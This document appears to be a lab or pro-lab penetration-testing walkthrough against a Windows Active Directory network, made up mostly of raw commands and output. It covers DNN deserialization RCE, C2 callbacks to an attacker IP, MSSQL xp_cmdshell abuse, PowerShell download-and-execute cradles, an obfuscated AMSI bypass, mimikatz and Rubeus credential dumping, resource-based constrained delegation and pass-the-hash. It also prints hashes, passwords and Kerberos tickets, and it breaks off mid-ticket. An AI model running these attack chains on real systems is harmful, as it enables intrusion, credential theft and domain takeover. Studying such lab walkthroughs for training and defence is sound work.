Initial IP enumeration
Service and Version Informaiton
- IP: 10.10.110.10
- Port: 80/tcp
- State: Open
- Service: HTTP
- Server: Microsoft IIS httpd 10.0
- Operating System: Windows (identified from Service Info)
HTTP Methods:
- Supported Methods: OPTIONS, TRACE, GET, HEAD, POST
Robots.txt Analysis:
- Disallowed Entries: 30
- Significant Paths: /admin/, /App_Browsers/, /App_Code/, /App_Data/, /bin/, /Components/, /Config/, /DesktopModules/, /Install/, /Portals/, /Providers/, etc.
DotNetNuke
The machine 10.10.110.10 is running DNN CMS which is having a cokkie deserialization vulnerability https://hackerone.com/reports/876708, https://www.exploit-db.com/exploits/48336.
Initial Foothold
The simple and fast way to get access to this machine is to use the metasploit exploit
[`exploit/windows/http/dnn_cookie_deserialization_rce`](https://www.exploit-db.com/exploits/48336)
Get-PSDrive -PSProvider FileSystem | ForEach-Object {
Get-ChildItem -Path $_.Root -Filter flag.txt -Recurse -ErrorAction SilentlyContinue
}
Directory: C:\DotNetNuke
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/19/2020 1:24 PM 62 flag.txt
As we are running as service account the most probable way for the privilege escalation would be to do Token impersonation attack. Rather than using exploit like Potato or Printspoofer, I used the getsystem command of metasploit framework to get the admin shell.
One getting the admin shell I wanted to move to sliver command and control framework.
So I uploaded the binary generated from sliver c2 and executed it as administrator user.
sliver (ROLLING_CEREAL) > execute ./agent_windows.exe -connect 10.10.15.57:443 --ignore-cert
hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7574cbf9d92c39d1d4dccd7b89301d2f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
The IP address of the machine itself is
In the arp table of the machine show a connection to another machine
Pivoting through the network
Setting up ligolo proxy
sudo ip tuntap add user jay mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 10.9.20.0/24 dev ligolo (Dont forget to change this)
./proxy -selfcert -laddr 10.10.15.57:443
C:\Users\Administrator\Desktop>agent_windows.exe -connect 10.10.15.57:8443 --ignore-cert
agent_windows.exe -connect 10.10.15.57:8443 --ignore-cert
time="2023-12-13T12:17:24-05:00" level=warning msg="warning, certificate validation disabled"
time="2023-12-13T12:17:24-05:00" level=info msg="Connection established" addr="10.10.15.57:8443"
Enumerating Internal Network
Exploiting mssqlbrowser
.11
https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/
[+]SQL Server Browser service is already enabled and running.
[**] Finished Enable DAC Task
Instance LinkedServer Username Password
-------- ------------ -------- --------
SQLEXPRESS m3sqlw.m3c.local sa RDO1uDB05g
PS C:\Users\Public\Desktop>
Logging in to mssqlclinet
mssqlclient.py sa:RDO1uDB05g@10.9.20.13
RDO1uDB05g
select srvname from master..sysservers
select * from openquery("m3sqlw.m3c.local", 'SELECT is_srvrolemember(''sysadmin'')')
select is_rpc_out_enabled FROM sys.servers WHERE name ='m3sqlw.m3c.local'
EXEC master.dbo.sp_serveroption @server = N'SQL03', @optname = N'rpc out', @optvalue = N'true';
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
-- Enable show advanced options on the linked server
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [m3sqlw.m3c.local];
-- Enable xp_cmdshell on the linked server
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [m3sqlw.m3c.local];
-- Optionally, you can disable show advanced options again for security
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [m3sqlw.m3c.local];
-- Execute 'whoami' command on the linked server
EXEC('EXEC xp_cmdshell ''whoami'';') AT [m3sqlw.m3c.local];
-- Execute 'ipconfig' command on the linked server
EXEC('EXEC xp_cmdshell ''ipconfig'';') AT [m3sqlw.m3c.local];
EXEC('EXEC xp_cmdshell ''powershell -Command "(New-Object Net.WebClient).DownloadString(''''http://10.10.15.57:443/large1.ps1'''') | Out-File -Append ''''C:\Users\svc_sql\Documents\large1.ps1''''"'';') AT [m3sqlw.m3c.local];
EXEC('EXEC xp_cmdshell ''powershell -Command "(New-Object Net.WebClient).DownloadFile(''''http://10.10.15.57:443/HANDICAPPED_LEADERSHIP.exe'''', ''''C:\Users\svc_sql\Documents\HANDICAPPED_LEADERSHIP.exe'''')"''') AT [m3sqlw.m3c.local];
EXEC('EXEC xp_cmdshell ''powershell -noprofile C:\Users\svc_sql\Documents\large1.ps1'';') AT [m3sqlw.m3c.local];
EXEC('EXEC xp_cmdshell ''powershell -noprofile C:\Users\svc_sql\Documents\large1.ps1'';') AT [m3sqlw.m3c.local];
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
powershell -Command "(New-Object Net.WebClient).DownloadString('http://10.10.15.57:443/PowerUp.ps1') | Out-File -Append 'C:\Users\svc_sql\Documents\PowerUp.ps1'"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:443/PetitPotato.exe', 'C:\Users\svc_sql\Documents\PetitPotato.exe')"
./PetitPotato.exe 3 "powershell -ep bypass ; powershell C:\Users\svc_sql\Documents\large1.ps1"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:443/HANDICAPPED_LEADERSHIP.exe', 'C:\Users\Administrator\Documents\HANDICAPPED_LEADERSHIP.exe')"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:80/mimikatz.exe', 'C:\Users\Administrator\Documents\mimikatz.exe')"
mimikatz # lsadump::sam
Domain : M3SQLW
SysKey : 2aa1b3c2027d47c1a8432f8d2e455268
Local SID : S-1-5-21-907414912-929592110-1210139672
SAMKey : 4c64e99784b32888758343dd112f02f4
RID : 000001f4 (500)
User : Administrator
Hash NTLM: f762bda6a668b1ae8de5534acfa306da
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x6f0f71 /service:krbtgt /nowrap
doIE9jCCBPKgAwIBBaEDAgEWooIEBTCCBAFhggP9MIID+aADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4IDwzCCA7+gAwIBEqEDAgEEooIDsQSCA62t3vY1fi2SOhS61QYWB0QkVkO4FAd7vcX4D6QIRGHA1HeQCHF/yAof99yNP65oUEcLyP/KBfiVhzR4iAOyAtONJJp790oeGOOG91XaNs/rRPnCctxFMtj7VIzfOupyakzXDVo7JR/pE5ApXJTTfWnqGDHNg5VenAXvWWfDWBCmbpQDgiJ3+Wou1UKZ8r0fqLbPgE09dyVBXWZPbRhFmHx802s3lpnkc+TR7YZFxtNU1RVmaRqyqbFeBq3YoBT55eMF/VMcDwrlMJcGUpd4UuoXTd0HEvMuBBQhQAKKTTDycfsrhJkYtpCe6o6BjiN/KzAlvWo/GZcwFPazEfsw4jwrw1J5ec3g9Jdj6uRmceaHFC4pJ2mSI18DxuAHRuC/RkkO5YPoZhOxN+pWHoXCO1jfv4WfNMMrfOKczXM72opOLTqyR/af2mMA5DMy+5XqWGd5Sl1QX+7at2+FdF/bKo1R/m1nYWTRM99xzKtmV0EtSt7/G+QYuz5Exy2iw3zcqID1Wmqu3WEbIdhT/Z1LsLmaGhHLK0m6Fx8iR4WQTAN0OWOE1YfWkPSc9fhrPX1Sil/BUY7Sl/d4DFwWHvIEPTRQsgKExoVfDNN14NkLfTNQ03opC/yw/Hsb4gWTNJgHVickt/7i+yc8aTKAE44HVs+TvGE5Bg5lutr8H+DuvabWy6rX32KIfyKlbm5kXvok6PNWWxTwEe4wsHd5UFRCsfJpGHgBUW/+adG2opEPoV5SeIHjdXyNqR3Zxnq4yuX07dx3vSqpULEAMY2PwC+d5W1xIgN2ZQOKYewmg6lwfXSD1diYkR+aTc5klBovvxr9w+tnJOpmGNc2Y40ZYlhhssij0DLbVEBVYyGWIh4lVk+/3Gr2KtYKZqDO0ntp26tZwgDdRavFFFQTry8m4Ruw9gLLBv3yV/udr8qQA+c+rGSzE9psb/6QS4CS1wML5LQ8vwafTiPi53ZKBfhW+3/4zrS8ZrMa+v5YGVQ0VX0fVc0Z1ndF3bKryyr9Ahm3K3r+4eIxY97b81I1N50NBaEDuY9kj0ih03A5o6ZburwTHnc6VPmhAAW4HmeIWV8Da7fh50/3eIWtq/H+lYU2qomw775Cdb/NymhNxBWrsIAzd/JxkI445RNF5Y1OEDhA0nMO54k7T1zK+rHk0W+yv/mV9jEr87vWwucWH51nwv35c1vdeLWreSpPu7wf+Rm2Hi263gNmAsE1aEmkC+MY90eHG7P5jwiejcFS0G6nhY9TzaOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEICLDcqSK4+/2sWTp4GdtDoYAewoKfgR68rV9Hud/x9CboQsbCU0zQy5MT0NBTKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyMzEyMDcwMjAwMDVaphEYDzIwMjMxMjA3MTIwMDA1WqcRGA8yMDIzMTIxNDAyMDAwNVqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw=
Get-domainuser | select cn, logoncount
Getting tgt for svc_sql from above
[IO.File]::WriteAllBytes("C:\Users\svc_sql\Documents\tgt_svc_sql.kirbi", [Convert]::FromBase64String("doIE9jCCBPKgAwIBBaEDAgEWooIEBTCCBAFhggP9MIID+aADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4IDwzCCA7+gAwIBEqEDAgEEooIDsQSCA63XKzRymdAzyn2TzlE5FMdIMqvwK5sUF9xzEWMviP2YxDGFSVTFhkrsCqn/+AhKCMyEFPHsuLtLdCG+2vRkn8leGHwxVJHdkwcTZs8nlje4w5NwF4uRk/YNALMcHOA2YX0NrEkb+iKcPuK0iq/clKwiizjCLrrVNRdtznd00q72ZJ68SRwXsgtfgFDkMy/PExGXW47PIIZEpswBgUjaXMHtLuujRVo285FHf7BP7tv64u0F+wXxViKtE6fRf1jzJMTmXceMP0zCe/6wWxYE5EJmPAAZAiK9F8D+5/KrYMa0NxKnHAg6zIMU+znk6BHsBgVvn9AiPHGGUBciG2IYI/K9LYBpiYa1Rw4DVq2zg0iuCi/ZTgMv3AlCQh2trE2ED9CoDZP7e5Gp25sDQsoRDUITz/pxpjjFGikgX2EY35mO91ejnjFsqfgAqv58nqx+YmSA5eM3EKkQFqyaTEzR8zY9CjMNGyJPv0BfN8dKkkFBnZVrQFVbQBHHqIDGaWoV98cCumumUrQBETHt0i5/1WRmkTuHoOZZh07cqcJhm81/pVaHz7uAvsUhUFwO7y1T+bFdR0v5v2IFZ+q6B9q7i9WCqw8b5uoalwWEQMPTlDsJRklNT8DWFtWBSReZi2m3YGBtjg3PyXi7A50y3kU/M+VlukqV9pQ4dQ2EiczmfcGhJ+3bEIpGoThHOH/Ih+Bo65W0CTKQj/Me9UMn9ITEFrLJyybzx5j9f7b6J1C8AnR675Uhabwc5sV8NAogA6IOKmjfJOGd0M5gvh99O866SHw3e7kKGrYp91IgVcKgcxr4tM1MZZhbfDHRBpN7vl5AH+jasdSx8kmNVHQyjEtsB/VHA2NSVhDRNdRVf+cQIOvtbWt/WAe8bBAQly4Kv4HyFe0rTsv9VHkLCHjYaKN44SBA6bKOdfc7OLCBBwrDx3dt1ppyVM6/xmQKwNGS3oeuWRY7QPuhZUNrW6qPYDntXYodFKUgLI/4WnCJvItfgVm2VfaTGdFuKJ3SZLA1du7J6weVTfXiK7GypX2vsyRneB+OVGrj58+4PpJIm3isCcgBSC0hNbuUX+08gqv5jNOqc6b9QLY67G7wBXDeQm89Q9K29apLecBwH/jVVguAqs+dEv8MvsYqmcHTtQdrGyw4HhnrpeHDhPtO3vZ6z6x4GnsYPmgW7tPpOcGPXmjb7xKswn3aSIK5FEL79OfJnLbulJppc47yb0g15GPqgKpw+nN9IB2VI5BbANC9SJNaMKOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoQsbCU0zQy5MT0NBTKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyNDAyMTAxNDAwMDBaphEYDzIwMjQwMjExMDAwMDAwWqcRGA8yMDI0MDIxNzE0MDAwMFqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw="))
bloodhound-python -u 'svc_sql' -dc 'm3dc.m3c.local' -no-pass -d m3c.local -c all -ns 10.9.20.12 --cachefile ticket2.cache -k
./Rubeus.exe s4u /impersonateuser:micheal.crosley /msdsspn:time/m3webaw.m3c.local /user:svc_sql /altservice:http /ticket:doIE9jCCBPKgAwIBBaEDAgEWooIEBTCCBAFhggP9MIID+aADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4IDwzCCA7+gAwIBEqEDAgEEooIDsQSCA63XKzRymdAzyn2TzlE5FMdIMqvwK5sUF9xzEWMviP2YxDGFSVTFhkrsCqn/+AhKCMyEFPHsuLtLdCG+2vRkn8leGHwxVJHdkwcTZs8nlje4w5NwF4uRk/YNALMcHOA2YX0NrEkb+iKcPuK0iq/clKwiizjCLrrVNRdtznd00q72ZJ68SRwXsgtfgFDkMy/PExGXW47PIIZEpswBgUjaXMHtLuujRVo285FHf7BP7tv64u0F+wXxViKtE6fRf1jzJMTmXceMP0zCe/6wWxYE5EJmPAAZAiK9F8D+5/KrYMa0NxKnHAg6zIMU+znk6BHsBgVvn9AiPHGGUBciG2IYI/K9LYBpiYa1Rw4DVq2zg0iuCi/ZTgMv3AlCQh2trE2ED9CoDZP7e5Gp25sDQsoRDUITz/pxpjjFGikgX2EY35mO91ejnjFsqfgAqv58nqx+YmSA5eM3EKkQFqyaTEzR8zY9CjMNGyJPv0BfN8dKkkFBnZVrQFVbQBHHqIDGaWoV98cCumumUrQBETHt0i5/1WRmkTuHoOZZh07cqcJhm81/pVaHz7uAvsUhUFwO7y1T+bFdR0v5v2IFZ+q6B9q7i9WCqw8b5uoalwWEQMPTlDsJRklNT8DWFtWBSReZi2m3YGBtjg3PyXi7A50y3kU/M+VlukqV9pQ4dQ2EiczmfcGhJ+3bEIpGoThHOH/Ih+Bo65W0CTKQj/Me9UMn9ITEFrLJyybzx5j9f7b6J1C8AnR675Uhabwc5sV8NAogA6IOKmjfJOGd0M5gvh99O866SHw3e7kKGrYp91IgVcKgcxr4tM1MZZhbfDHRBpN7vl5AH+jasdSx8kmNVHQyjEtsB/VHA2NSVhDRNdRVf+cQIOvtbWt/WAe8bBAQly4Kv4HyFe0rTsv9VHkLCHjYaKN44SBA6bKOdfc7OLCBBwrDx3dt1ppyVM6/xmQKwNGS3oeuWRY7QPuhZUNrW6qPYDntXYodFKUgLI/4WnCJvItfgVm2VfaTGdFuKJ3SZLA1du7J6weVTfXiK7GypX2vsyRneB+OVGrj58+4PpJIm3isCcgBSC0hNbuUX+08gqv5jNOqc6b9QLY67G7wBXDeQm89Q9K29apLecBwH/jVVguAqs+dEv8MvsYqmcHTtQdrGyw4HhnrpeHDhPtO3vZ6z6x4GnsYPmgW7tPpOcGPXmjb7xKswn3aSIK5FEL79OfJnLbulJppc47yb0g15GPqgKpw+nN9IB2VI5BbANC9SJNaMKOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoQsbCU0zQy5MT0NBTKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyNDAyMTAxNDAwMDBaphEYDzIwMjQwMjExMDAwMDAwWqcRGA8yMDI0MDIxNzE0MDAwMFqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw= /nowrap /ptt.12 from .11
Enter-PSSession -ComputerName m3webaw.m3c.local
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:443/HANDICAPPED_LEADERSHIP.exe', 'C:\Users\Micheal.Crosley\Documents\HANDICAPPED_LEADERSHIP.exe')"
./HANDICAPPED_LEADERSHIP.exe
powershell -Command "(New-Object Net.WebClient).DownloadString('http://10.10.15.57:443/PowerUp.ps1') | Out-File -Append 'C:\Users\Micheal.Crosley\Documents\PowerUp.ps1'"
powershell -Command "(New-Object Net.WebClient).DownloadString('http://10.10.15.57:443/Seatbelt.exe') | Out-File -Append 'C:\Users\Micheal.Crosley\Documents\Seatbelt.exe'"
Active MQ exploit 2016
PS C:\ActiveMQ\conf> cat jetty-realm.properties
cat jetty-realm.properties
admin: 3f18DV^t!svBV4ntcrLRTWi2XaMCDK, admin
#Cyb3rN3t1C5{CR3d$_!n_fil3s}
activemq.username=system
activemq.password=manager
guest.password=password
curl -u 'admin:3f18DV^t!svBV4ntcrLRTWi2XaMCDK' -v -X PUT --data "@jsp-reverse.jsp" http://10.9.20.12:8161/fileserver/..\\admin\\jsp-reverse.jsp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Visit the website and enter the information
./PetitPotato.exe 3 HANDICAPPED_LEADERSHIP.exe
RID : 000001f4 (500)
User : Administrator
Hash NTLM: a549c946ddefbc3d6cb701f66a45fdd4
WriteAccountRestrictions
The user SVC_APACHE@M3C.LOCAL has has write rights on all properties in the User Account Restrictions property set. Having write access to this property set translates to the ability to modify several attributes on computer M3DC.M3C.LOCAL, among which the msDS-AllowedToActOnBehalfOfOtherIdentity attribute is the most interesting.
The ability to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property allows an attacker to abuse resource-based constrained delegation to compromise the remote computer system. This property is a binary DACL that controls what security principals can pretend to be any domain user to the particular computer object.
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x787316 /service:krbtgt /nowrap
[IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\svc_apache.kirbi", [Convert]::FromBase64String("doIFFDCCBRCgAwIBBaEDAgEWooIEIDCCBBxhggQYMIIEFKADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4ID3jCCA9qgAwIBEqEDAgEEooIDzASCA8hu+o5UGPFpRkpgQ8iBmBy1JJPZjLbmOajZ+wxCd5EEYnyF1E1ZvenH+krRPdHRcricNcqxyhtLRP9IlQfcpsabWs/B4SOCHwnwo7yWvyNDTWexUZIDjYF/eMUI4RkX/0a6LUpQgVYcx7+htzKuuvR5PFEIHVo7pqRcI3Y5OakNT0PWw0Ej0Tzc1rEOVEZqucQi3oPqa4kJXC10FikCukmRpxdMZEq6QeaClq9HgqhG9g5AsTfq0x7yp+zIPZQfJFNuTJEl+NSvH+zx+TQrHbaNLQFupLMIDyOqgM4Yb5qhbm2+gH5OO6qLT0MWOSdGXVdU7eXDr0L7py9d2nbPDI0AZnpRw+H2lw+1t7t0AlexknmZT1QFaecwfEzIDpXDzQbO0Azqi+wmgayFFB9Gt9viMhKV+upQHfLDoe17YLoX3tI/xxUtU7FYRKJ8MWlNKNS7wsKneaV+Ix47LAnqBjZ9VIA08Ii61RJs8VbnH7hkk7KkqV84B2IdQhTAimhkCufixoTSMkPpmYEfhttNnrvX0OqsdqMcMg3KhZSy01tElmZiWOK9dKNLwdXT+kqOYaRvEuBk5EUHDJMuhYgFC67MkrLu1nE9l8xrt7zmqxKn3/IY2sNmiXzQpeM6JuenVTF+NBikdXosFgJgU05DyBo/VL46tG+/LXIIyY0dTD/hdzRmK36RY73gk0+igXDXw/emjwwFwGD+9SbWtQg9ktOQ7Dc/Fx5UblLO/+3SED1VVqSnvTPzDzDiilOoafqWcU4CukRv9SNzL1/wGGii70aiZZeXnqt/5YAkWdqI64rNpXl8aMpw0Iafun6wUP+C5eh6B/lcsyHzmy9LWZltc8jeZwe5/QxADGl2NXutCDniDJZi3cXE+lbxNgyzWECvFMbzjG9Yh3F6qjO8S2MPvMRPViG7y9sO7KJEqkz+OL0wCWWDpmuQH6c2w0x7WZnP35QeD1NxzzKEzPtGtFFSRTDhRsHgDUWrrz8UGe2sSl4WKs0wF2sCZrsvt8/aKSNlyf12gMnRdcfLUmKmAhNWRoQRRD6pNBFKPsXs33MlUhF+Psb198gvKxqLvVS6jdcNvukdrCLdC9/I0qh3wZDu3SFQnFgk0yBB5GV+WsJ7a9WHnIOI14x+NCSL5lgm/Wpzsbu9urLxRNmNxDr5jThjZ1eClWP00emfx5bAo8viF9rnek/VGyj3DJ73oTFqIVqkyNR7K+K2IzfXFF32uyw2PepKk8/VMiNYC991IHAS9ckMf+4FnciGMJgbcMwPcZkFFkDvjd7kaNZlo6OB3zCB3KADAgEAooHUBIHRfYHOMIHLoIHIMIHFMIHCoCswKaADAgESoSIEIKdQwTyftfGioqqktUKefUbvhpITypf8Lr36LcqfyZDDoQsbCU0zQy5MT0NBTKIXMBWgAwIBAaEOMAwbCnN2Y19hcGFjaGWjBwMFAEDhAAClERgPMjAyMzEyMDkxNDMwMThaphEYDzIwMjMxMjEwMDAzMDE4WqcRGA8yMDIzMTIxNjE0MzAxOFqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw="))ticketConverter.py svc_apache.kirbi svc_apache.ccache
export KRB5CCNAME=svc_apache.ccache
rbcd.py -delegate-from svc_sql -delegate-to M3DC$ -action 'write' 'm3c.local/svc_apache' -k -no-pass
export KRB5CCNAME=ticket2.ccache (tgt of svc_sql)
getST.py -spn 'cifs/M3DC.m3c.local' -impersonate 'Norma.branham' 'm3c.local/svc_sql' -k -no-pass
export KRB5CCNAME=Norma.branham.ccache
└─$ cme smb 10.9.20.10 -u norma.branham --use-kcache --sam
SMB 10.9.20.10 445 M3DC [*] Windows 10.0 Build 14393 x64 (name:M3DC) (domain:m3c.local) (signing:True) (SMBv1:False)
SMB 10.9.20.10 445 M3DC [+] m3c.local\norma.branham from ccache (Pwn3d!)
SMB 10.9.20.10 445 M3DC [*] Dumping SAM hashes
SMB 10.9.20.10 445 M3DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:7574cbf9d92c39d1d4dccd7b89301d2f:::
SMB 10.9.20.10 445 M3DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.9.20.10 445 M3DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.9.20.10 445 M3DC [+] Added 3 SAM hashes to the database
psexec.py m3dc.local/Administrator@m3dc.m3c.local -hashes aad3b435b51404eeaad3b435b51404ee:5a0618a9e03bd9fa9efbe142468afed5
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
xfreerdp /u:Administrator /pth:5a0618a9e03bd9fa9efbe142468afed5 /v:10.9.20.10
Cyb3rN3t1C5{C0n$tr@!n3d!}
Method 2
$psh = [PowerShell]::Create().AddCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe").AddParameter("ExecutionPolicy","Bypass").Invoke()
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Import-Module ./powerview.ps1
$ComputerSid = Get-DomainUser svc_apache -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer M3DC.m3c.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/mist.ps1')
From sliver
rubeus tgtdeleg /servie:krbtgt /nowrap
doIFFDCCBRCgAwIBBaEDAgEWooIEIDCCBBxhggQYMIIEFKADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4ID3jCCA9qgAwIBEqEDAgEEooIDzASCA8iJbZcOLp/ZsrFUTWbrdKceCRVJHNbwh/pM8H2BUv1JvE0ZDe0JxtYqK5fSG5E3IecKLKHtrJGsNU+N4219oQmSoj1Zj+zf2SIcNW8KpZmIn3VvsbZPSTp/UHe9R3ObpM4sKsSnN3qZJH/KueWvwMrs0dXTA2brlv4JXCIUY528RVYtHiH1+NvkKInARg7XuGcKUdM4cAXflVdHoFYhRcGWc0jIrBcTVGA2eJ5GSfGWYXwzmk1iijOkluVMHG92FphlUH6qbljq0rxK6HwHMrrkauC0Qg7CFq3Gt10ZDSMDDSZRMTxsU23pcm8dUtlbjvohjZ8vCHVTyU5/bUnSu4+XmqfxPnhWmwGZkCDxXCo1FrtUXWIhuGBZgR/a8/jkcz/uP57sN3XvZiWLTg49uwD50KShRooUDK3ZMvCyyHSNcuQxTLM1Gcc6LaEBYRWO+q21hh+GiEkc8Y02Y2qqFu+WgmydVPxX8Zuv8RqgceJTBvVKdJHcsJK6GurX8kETwtqJiH0lRFnBLoX/bKu2seLwjPhpyN/9mzn8CBuRl1FPMkanHYrbgADn67mq3cZ2goaiVXOoVb+BLXWHhB/gFR1SGbVKmAzQ0YfNlQPqsTpjBuwA9s8+CqcXIfpI6VqJhnJsg8QApBT58+nddfLRqUFpRI3B11MImV+DXTNfDaJ45/BoooqHjzw1B235NfkUpXBLsQBQTccYpcfGNBRLOGRqIMTV7m3KrPE0WKXLXaTyKWoiXT2JYgvNvOyBpLBgtz6MAp5V9L3IuR9Dww8EA/sd61XQuzArp0hvjyPnOXZQWjHP4HDbWFXT3gIH7hCksr5DdWBiOsaEd/BIe65SSfJYq7zfLi9JHXMCo8dewvtwTYPEcCacTX+vEbnT/aRwC5bjsbVhy1oyEb/nmafxCQT7DDBgxLG+vmU80wWXc3waag0gQAXcoyWLgZFLfotUNRIApQQO44RGwzfz4xmnU3dU0vKtUpdetvptr/h+Kh6ke6Gi3z/K7Rp1+y1mB3A4Q3KXKShDCUxQSTCMDjpyGIrx6MmWbJVcrFh1qccKEpQqgzJFtHdL1eXj+dkhZeur4N2Cgq9qqFHtZEIKdjsn3D5z826rUtRWNLP6YBE9xu0Z+c/yoHv0O2oyOYj45gVFKUl79sQ6xjck8DE/t7YWogzkSorOdJ5nT3aXi9rMMRGo4ZdDIF5amMxiOJet9s1Ba5cbsPOHYwcny1uXHMDff6oV0ZuUALWHJXGrWGp9mikHHqSPX6lAjZcPERw6I84DnEDEBMGibtmHp6OB3zCB3KADAgEAooHUBIHRfYHOMIHLoIHIMIHFMIHCoCswKaADAgESoSIEIG2n1Qcp8BKxEwWG9Gt6sNNkpdN57LGyulrYhCMIe7ApoQsbCU0zQy5MT0NBTKIXMBWgAwIBAaEOMAwbCnN2Y19hcGFjaGWjBwMFAGChAAClERgPMjAyNDAyMTQwNDU4NTBaphEYDzIwMjQwMjE0MTQwMDE4WqcRGA8yMDI0MDIyMTA0MDAxOFqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw=
./Rubeus.exe s4u /user:svc_apache /impersonateuser:norma.branham /msdsspn:cifs/M3DC.m3c.local /ticket:doIFFDCCBRCgAwIBBaEDAgEWooIEIDCCBBxhggQYMIIEFKADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4ID3jCCA9qgAwIBEqEDAgEEooIDzASCA8hOkxJhvo5HLOHjtI3Y9reILNze2RlTrVPErR9JVe7kAPn7qkIJTvoiBq5bn7Cy+i9aLHevQUj5yApVinv0a1BXY+anpDvXPEhInCWVoWvu1w5g5YtTX0BqZTCX8VgSlmOeNEgCRY+4JsVbVT7LTX2YJdKXnNNxuy1NTz9zganPBkRwJHeqPNwgJxjCmNsM8EJZOAbWMjS7zxEWJ4BB+5h5oh6NiBQMfoLYACYNOK9sMCQSe9I16L4NrP+vm1IXBxoVWKm52LGUsWqcGQl2qZxWUiFPy4rDhvKUXWHjgtXP1aGqIOIqqHTR/RTwkEbaR7F8GW/4sWypTCvCDHBr8IFSmrX+v1IYEjxcqH1sDcjoYrZqbz0DpZAZnIEGFdUXa3qe5f39c070h+KytB3VZaMClgc/F7XfMTSn/c/aUZTwAIdOPiAOo3rIX65rEPTB6nXbI5UJJ58oTNTlDGY8ksYZew42DeylRKtNS6ie0YPNekvjRw9rWm8VhLXiJVSep0PLjaXz08du+kMldqd/jwfDMPGkqtXSYOxrpaEXZi0xrwF82VY